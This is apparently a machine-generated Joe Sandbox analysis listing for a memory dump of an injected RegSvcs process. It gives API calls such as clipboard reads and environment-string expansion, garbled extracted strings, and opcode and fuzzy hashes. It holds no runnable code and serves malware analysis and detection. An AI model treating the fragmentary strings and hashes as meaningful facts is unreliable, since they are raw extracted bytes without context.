                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                • String ID: C;t9$g`a&$q;t9$Mw
                                                                                • API String ID: 764372645-1637664290
                                                                                • Opcode ID: de5861658b0b11ae760b0e4fe66a7bab44178424747e39c32623664331fa80eb
                                                                                • Instruction ID: 3ffc40e8ecfac7351e4b3f588e98115927f77612834decca1a02964a46056ac6
                                                                                • Opcode Fuzzy Hash: de5861658b0b11ae760b0e4fe66a7bab44178424747e39c32623664331fa80eb
                                                                                • Instruction Fuzzy Hash: E6521774609340ABE724DF15C8A076BBBE2EFC5714F284A2DF495473A1D3399C86CB4A
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00425548
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: C@$vs$}O
                                                                                • API String ID: 237503144-3613062948
                                                                                • Opcode ID: 612be6679bc7c518d541a1a3bd86ff1bda2dfef51151766e8dc935e23222437a
                                                                                • Instruction ID: 229f61bd181e0d3e1816d5dac9f8e9b21ca4c795edffb3bcd82580893e2e3f3c
                                                                                • Opcode Fuzzy Hash: 612be6679bc7c518d541a1a3bd86ff1bda2dfef51151766e8dc935e23222437a
                                                                                • Instruction Fuzzy Hash: 236111B060C3559FE310CF259945B1FBBE5EB86714F40893DF8949B291C7B988068B97
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424D19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: ,J?H$0^#\$2N L$<ZvX$Yf
                                                                                • API String ID: 237503144-1848861685
                                                                                • Opcode ID: 352d15d9f24c16c61da26da978867a2d027ef5e98a053596fcfdd3d36aae38b8
                                                                                • Instruction ID: cf7ca87b2f0596926e46e05804bf3c396873adb78b926b1592a6b5006b988aa0
                                                                                • Opcode Fuzzy Hash: 352d15d9f24c16c61da26da978867a2d027ef5e98a053596fcfdd3d36aae38b8
                                                                                • Instruction Fuzzy Hash: F331F672A183604FE308CE29DC4136BBBE2EBC6700F16C52DD595E7284CAB599068B86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: X^U$-,$bb`l$g](`$q?u6$rO!y$s$wO!y
                                                                                • API String ID: 0-2316968779
                                                                                • Opcode ID: 616159b8467f867236aeabf19554ccb57c93c155bd9ac32f22d387ec66c956ab
                                                                                • Instruction ID: b80a0a21ed8a87b07576ad0ba0fd6a02d36ce5c2fa1e6a035ebc545b06362d39
                                                                                • Opcode Fuzzy Hash: 616159b8467f867236aeabf19554ccb57c93c155bd9ac32f22d387ec66c956ab
                                                                                • Instruction Fuzzy Hash: 39C1E67150C3918AC715CF25845076BFFE1AFA3214F1889AEE4D5AB383D739890AC796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 64$7jA$D$P4b3$U4b3$s$~r$-M8
                                                                                • API String ID: 0-1876645738
                                                                                • Opcode ID: d1e71ab9b6a31b86c410476175c1b4e6c0e8eb125f55606afd4317646a7dceb9
                                                                                • Instruction ID: d7253de12a5ac31247aecf402b659165ca0617a23e5a0d7132943c68ed4f2964
                                                                                • Opcode Fuzzy Hash: d1e71ab9b6a31b86c410476175c1b4e6c0e8eb125f55606afd4317646a7dceb9
                                                                                • Instruction Fuzzy Hash: 5B91ADB04193508ED3248F25C4A17ABBBF1FF92315F068A9DD4C95F3A1E7B88845CB96
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                • String ID:
                                                                                • API String ID: 2058664381-0
                                                                                • Opcode ID: 0d7c386abfe2bdb228737ef2f55fc659a3e442e5a9045e93012694c35bc894f6
                                                                                • Instruction ID: 34cb26e9e4c6b27c4c1662aee1e1ecac84295e8c5833f8bb625011490706dd8d
                                                                                • Opcode Fuzzy Hash: 0d7c386abfe2bdb228737ef2f55fc659a3e442e5a9045e93012694c35bc894f6
                                                                                • Instruction Fuzzy Hash: B541C6B19087929FD710AF78984935EBFA06B06320F06C77DE8E587282D3389559C797
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: YyE^${t$Mw
                                                                                • API String ID: 3664257935-3701178663
                                                                                • Opcode ID: 05d9e63fce0729a60e7d2af1c02dc65cd3ce7e9426828477944b2004357c9b88
                                                                                • Instruction ID: 1e3024dfe408ebe24ad3ce29a536408d1906c30e889e3e635620da0d5985478e
                                                                                • Opcode Fuzzy Hash: 05d9e63fce0729a60e7d2af1c02dc65cd3ce7e9426828477944b2004357c9b88
                                                                                • Instruction Fuzzy Hash: B3519E755483909BE320CF15DC40BABBFE2EFC6705F284A6DE4C567381DA794806C796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 'j7h$>n<l$IS$P^$QL
                                                                                • API String ID: 0-1761193668
                                                                                • Opcode ID: f7fbaae64fb9a875722841cbb7b2ea32f702bad3599d04f2af32adcf41bef345
                                                                                • Instruction ID: 5a425c430f50806010d92089ebefe52a2bda271445214b805fbe302423b536e6
                                                                                • Opcode Fuzzy Hash: f7fbaae64fb9a875722841cbb7b2ea32f702bad3599d04f2af32adcf41bef345
                                                                                • Instruction Fuzzy Hash: 931238B56083908FD7208F25D8517AFBBE1EFD2304F08492DE4C59B392DB399906CB4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (nm7$(nm7$:nm7$:nm7$hi
                                                                                • API String ID: 0-817421384
                                                                                • Opcode ID: cae3eabaf167c89d03809e2d4af40be31b31b975f3aea8647f4ac8d1e726bdb0
                                                                                • Instruction ID: 0be6a8663c43d4aaca04453db03c1950b5497c31327a35b9d14733426a195d32
                                                                                • Opcode Fuzzy Hash: cae3eabaf167c89d03809e2d4af40be31b31b975f3aea8647f4ac8d1e726bdb0
                                                                                • Instruction Fuzzy Hash: 77D188716083518BD320CF25C4A13B7BBE1EFDA354F185A5DE8C55B392E7798881CB8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: S"(w$S"(w$XYj[$f
                                                                                • API String ID: 2994545307-3050003921
                                                                                • Opcode ID: 31ca7bce7484abba1bb3a66f3687527102338f65e1a2f2bc0e588f5f04a08b43
                                                                                • Instruction ID: df6941b9aa2e2ced424d58079a3b466e12baaf5a429ae26393fff1d32766f347
                                                                                • Opcode Fuzzy Hash: 31ca7bce7484abba1bb3a66f3687527102338f65e1a2f2bc0e588f5f04a08b43
                                                                                • Instruction Fuzzy Hash: 56221375A093558FC724CF29C88062BB7E2ABC8314F29867DE8A5473D1D779EC05CB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: T*%(
                                                                                • API String ID: 0-2377645250
                                                                                • Opcode ID: 52d14fbc54c99a029ea946d3a866b15d44990a19da47116e540f8d15494a2dd2
                                                                                • Instruction ID: 0c303d40e34a7186604afdbdd00cfc7998b6900ffb3a34422ea6c98c0fe4b3a2
                                                                                • Opcode Fuzzy Hash: 52d14fbc54c99a029ea946d3a866b15d44990a19da47116e540f8d15494a2dd2
                                                                                • Instruction Fuzzy Hash: 526157B6A087549FE320DF68DC44BDBB7E5EBC1308F40893DE9949B281C7B49C058B96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: rA$0bA$P
                                                                                • API String ID: 0-790227366
                                                                                • Opcode ID: a4cf8d674109704139cdff7f8e87dcab1b123051f5de6d47eb62a1cdbf795e6c
                                                                                • Instruction ID: a5babcb8ed54065b205bcff55ba7991bbaf369a5866da8f6fcdd6ef657c872a3
                                                                                • Opcode Fuzzy Hash: a4cf8d674109704139cdff7f8e87dcab1b123051f5de6d47eb62a1cdbf795e6c
                                                                                • Instruction Fuzzy Hash: EE1259342083409FDB288F25DC91BBB77E1EB9A315F19497EE4CA87291D7389841CB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: IS$P^$QL
                                                                                • API String ID: 0-3323920504
                                                                                • Opcode ID: 7d29d132e3f5c06ebeb80cd66d2d7f655bd9e96c7f8337dc09a17619eedd602e
                                                                                • Instruction ID: 42f21f0a5f168e2f3ebf8116a957bd1db3afb56b5268cb0573a9cb9b079c9317
                                                                                • Opcode Fuzzy Hash: 7d29d132e3f5c06ebeb80cd66d2d7f655bd9e96c7f8337dc09a17619eedd602e
                                                                                • Instruction Fuzzy Hash: C51213B56083918FD7108F24E85176FBBE1EF96304F18486EE4C59B392DB78D806CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 3,:<$7szh$v0vp
                                                                                • API String ID: 0-104745936
                                                                                • Opcode ID: ed0767d2f2a0b56f4536f04bb6653413941b03dd609c5e20e988f72bcf202a73
                                                                                • Instruction ID: 721b8ecc1e4661e72dc5e0bd747af4cb1d7967cae904a70f53e867cd395dbef6
                                                                                • Opcode Fuzzy Hash: ed0767d2f2a0b56f4536f04bb6653413941b03dd609c5e20e988f72bcf202a73
                                                                                • Instruction Fuzzy Hash: 62517B70A4C3904BD718CF29CC907AFFBE29BDA314F184A2DE1D59B391C679844ACB46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NP,?$~*
                                                                                • API String ID: 0-2095874253
                                                                                • Opcode ID: 23957fee8452972a4c21f42f8294f8c111f90aa9540253d1d8fd0714b633606e
                                                                                • Instruction ID: 638d668569a9892d17dbb7577bc3ddf9df1cbadb231a1520db93c9a85d25f8d9
                                                                                • Opcode Fuzzy Hash: 23957fee8452972a4c21f42f8294f8c111f90aa9540253d1d8fd0714b633606e
                                                                                • Instruction Fuzzy Hash: 26A101716043009BD714DF28D8926B773B1EF86325F18492DE986873A1E378ED45C79A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: qO!y$vO!y
                                                                                • API String ID: 0-270409050
                                                                                • Opcode ID: cbc75fbb4900678ccce19fa31768d601e843eb5df3b2028fae25a5db64a1dacc
                                                                                • Instruction ID: 8cd65dc74ad0327e81428561c772edfdc298159a592d3b611e3a0970eea62f03
                                                                                • Opcode Fuzzy Hash: cbc75fbb4900678ccce19fa31768d601e843eb5df3b2028fae25a5db64a1dacc
                                                                                • Instruction Fuzzy Hash: A0A1FA326442614FC712CE288C9079BBBD1AB95320F18863EE8E98B3D2D678D947D7D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ZA$^A
                                                                                • API String ID: 0-3223166598
                                                                                • Opcode ID: 12dd56d151bf32caf668782ab46c6c9b88569373734b1fa521a36ba00cab23dc
                                                                                • Instruction ID: ddb70907bf04f98cabf3af2da84173535de7c927cd24329114a76374933c9aed
                                                                                • Opcode Fuzzy Hash: 12dd56d151bf32caf668782ab46c6c9b88569373734b1fa521a36ba00cab23dc
                                                                                • Instruction Fuzzy Hash: F7410D78A193128BD314CF28D45126BB3F2EFC5310F98891DE4C68B785E77C9905CB8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @EBz$DPX-
                                                                                • API String ID: 0-1543336672
                                                                                • Opcode ID: 577c746759168d7aff2146727c5b4464635aba7a7102cf7440779ab70ccedaab
                                                                                • Instruction ID: 7851277b058ac0b209cefe19eaa8db76db98b69de6e75481cc50d565f205e5fa
                                                                                • Opcode Fuzzy Hash: 577c746759168d7aff2146727c5b4464635aba7a7102cf7440779ab70ccedaab
                                                                                • Instruction Fuzzy Hash: 0821457AA586004BD30CCF26CCA226ABBD39BD6314F1DD57E94C1D7395CE7CC8028A4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: YDF
                                                                                • API String ID: 0-1134066413
                                                                                • Opcode ID: 2385d3fbee1d5f09e30c5fcb0a3192e7d8994c217124a81d4785da73d0924ee0
                                                                                • Instruction ID: f2c25fa3394d1cdb042d63869d5334888943558a092f50b4faa42898af849086
                                                                                • Opcode Fuzzy Hash: 2385d3fbee1d5f09e30c5fcb0a3192e7d8994c217124a81d4785da73d0924ee0
                                                                                • Instruction Fuzzy Hash: C1125A716083508BD7248F29C8903EBB7E2EFD6324F18896EE4D597391DB389D42C756
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <=
                                                                                • API String ID: 0-1782720273
                                                                                • Opcode ID: 6dd3167a28c0532533e55076e64c0ac118e924d4b973979e5a2fd842394f0905
                                                                                • Instruction ID: 2d5b5d10aa978c34c829ed5a9a754e4b33e128829d68657d6e1262cc36a4df89
                                                                                • Opcode Fuzzy Hash: 6dd3167a28c0532533e55076e64c0ac118e924d4b973979e5a2fd842394f0905
                                                                                • Instruction Fuzzy Hash: 71F149B5A093408BE334DF25D841BABB3E2FFC5714F19852EE4998B391EB349841C75A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8h
                                                                                • API String ID: 0-355420014
                                                                                • Opcode ID: 7a1d5bf2cdb9b687558e6260db994d4891e08432c718503675804cd323388fce
                                                                                • Instruction ID: 7880c12a320e834da22beb45adbbff2352b3a491f9d020b456ded142b3f5f8e4
                                                                                • Opcode Fuzzy Hash: 7a1d5bf2cdb9b687558e6260db994d4891e08432c718503675804cd323388fce
                                                                                • Instruction Fuzzy Hash: A3D1DD706083508FD710DF64D891AABBBF0EFD5318F08892DE9859B391E379D806CB56
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: b`
                                                                                • API String ID: 0-4035881605
                                                                                • Opcode ID: 450600f702eca60eb883aac7659496276727bea5a216c2ef69dfea68026a0994
                                                                                • Instruction ID: c0520297eb3adcb8f3e7156067e2b84242ea816692d5278fa2f5c3550a7600af
                                                                                • Opcode Fuzzy Hash: 450600f702eca60eb883aac7659496276727bea5a216c2ef69dfea68026a0994
                                                                                • Instruction Fuzzy Hash: 72C138B5A00321CBDB28CF24C892277B7B1FF96310B58925DD8525F79AE378A851CBD4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 885fb8836b2287351fdde6e855c97389a0fb2deaad078ac45cb5831455ce2eeb
                                                                                • Instruction ID: 8b08a49a2ae448aa1ab36bdaf8c7bc44a39a0b27c48ee0e13f369eb4cc08eef8
                                                                                • Opcode Fuzzy Hash: 885fb8836b2287351fdde6e855c97389a0fb2deaad078ac45cb5831455ce2eeb
                                                                                • Instruction Fuzzy Hash: F2D1E372B083255BC714CE25E48166FBBEAAF84314F598A2EE899873C1D738DD05C7C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NP,?
                                                                                • API String ID: 0-3110377521
                                                                                • Opcode ID: 277b2d8aba25ebaca961f41e26d6ed4be2783f1930e3b474b3f1f864761ee893
                                                                                • Instruction ID: 48a1e74a43d32d56d097ee5a720c26fde6d37ce628be33490e6cb5f02a8524d6
                                                                                • Opcode Fuzzy Hash: 277b2d8aba25ebaca961f41e26d6ed4be2783f1930e3b474b3f1f864761ee893
                                                                                • Instruction Fuzzy Hash: 2DA18C31B043049BD724DB65CCC163BB396EBCD718F28662EE9A5673D2D7389C018B99
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042992E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 7e8f2c0d766f4dcca8df9cb47dd67d6392822af6258273013d36131482ace8ef
                                                                                • Instruction ID: 274383d700a58c9d09b626b80b60ce684ceed01be6f806bd671cff94e1d12845
                                                                                • Opcode Fuzzy Hash: 7e8f2c0d766f4dcca8df9cb47dd67d6392822af6258273013d36131482ace8ef
                                                                                • Instruction Fuzzy Hash: A0312972B1C3259FD720AF64B84176FF3D4DB42704F58883EE899A7241D6399C06C69B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: }yyv
                                                                                • API String ID: 0-2762662452
                                                                                • Opcode ID: 92385740ba2164b8250d6eb4994fefb03e437076927f81a6504f88d4db7ebe61
                                                                                • Instruction ID: d0fb55c9af4d4a8908fff3dca406877d634963ce57434341bd30e0d50eca6a3a
                                                                                • Opcode Fuzzy Hash: 92385740ba2164b8250d6eb4994fefb03e437076927f81a6504f88d4db7ebe61
                                                                                • Instruction Fuzzy Hash: 86918D7164C3618BC318CF29D49036BBBE1AFD6314F984A7EE8D697341C778D8098796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: }yyv
                                                                                • API String ID: 0-2762662452
                                                                                • Opcode ID: b938b62bdadf068e384865459352bae1852732d104dd4fdec1f9e66e00df3a7f
                                                                                • Instruction ID: fc7333de77dcb4a5e4f9223bd65d23dafec24073a6d44b68be1fc1d0f732a7d4
                                                                                • Opcode Fuzzy Hash: b938b62bdadf068e384865459352bae1852732d104dd4fdec1f9e66e00df3a7f
                                                                                • Instruction Fuzzy Hash: 06917E7164C3618BD318CF29D8A037B7BE1AFD6314F98467EE8D797381C67888098796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: }yyv
                                                                                • API String ID: 0-2762662452
                                                                                • Opcode ID: 3a52e5123617274a2690acd1d65039aa0b031ec491876c27f0a08a2663993c51
                                                                                • Instruction ID: 9ab7f8286d5d0c04a5e511a41cde927bbf0b3f2e95bf45a3a8d16cc43a0ed2c0
                                                                                • Opcode Fuzzy Hash: 3a52e5123617274a2690acd1d65039aa0b031ec491876c27f0a08a2663993c51
                                                                                • Instruction Fuzzy Hash: 72816EB564C3618BC318CF2998A036BBBE1AFD6314F5946BDE8D697341D3388809C796
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NP,?
                                                                                • API String ID: 0-3110377521
                                                                                • Opcode ID: 3fab16dcf5e3c7deb766e4f7ff53259720249a1f2b16e3603fb18f5a63909bcb
                                                                                • Instruction ID: 7a7cc81436fb890a2ff0f46980fd0cd0a0eecb4c8bb365b6715e1f98330af843
                                                                                • Opcode Fuzzy Hash: 3fab16dcf5e3c7deb766e4f7ff53259720249a1f2b16e3603fb18f5a63909bcb
                                                                                • Instruction Fuzzy Hash: 1251157A60C200EFE7009F15FC4166A73A2FBCA30AF18497DF949522A1E7359C57CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -(#g
                                                                                • API String ID: 0-675101757
                                                                                • Opcode ID: 06f7d05e14d67a63795e35a03bc25f951a567a278af69ba055cc3c79fdcf7687
                                                                                • Instruction ID: 85621ed855e747ca2bd24ffee8a10a62e2c69ada1e6a13508ba0be1248e45630
                                                                                • Opcode Fuzzy Hash: 06f7d05e14d67a63795e35a03bc25f951a567a278af69ba055cc3c79fdcf7687
                                                                                • Instruction Fuzzy Hash: 2D41E66060D3E18BDB368B3595647FBBFE1AFA7304F584AADC0D99B246CB384106C716
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -(#g
                                                                                • API String ID: 0-675101757
                                                                                • Opcode ID: c68367a782d0418c88efe72e211426c3c8a69298bbc2d476b2bbf85bfc873e94
                                                                                • Instruction ID: 6505d5137a7935af8bcfd12cb380c2a47b189af31798fa6c40774f61b50ae9b0
                                                                                • Opcode Fuzzy Hash: c68367a782d0418c88efe72e211426c3c8a69298bbc2d476b2bbf85bfc873e94
                                                                                • Instruction Fuzzy Hash: AE41226050C3E18ADB368B3590A47B7BFE09FA7204F985A9DD0DD9B287CB384006CB17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 56c27cc823615eb7f8a782ee4f329985dfbea0fed2f3b5a5b8d7194a6444c074
                                                                                • Instruction ID: 53c8245dd2ce3d572382ac641216a841cb97c1b7afe8c7e7762af22ed9f1ce74
                                                                                • Opcode Fuzzy Hash: 56c27cc823615eb7f8a782ee4f329985dfbea0fed2f3b5a5b8d7194a6444c074
                                                                                • Instruction Fuzzy Hash: 5C41ADB06193018BE708DF25C46122BB7F2FFD5704F29592DE5C69B390E7788905CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -(#g
                                                                                • API String ID: 0-675101757
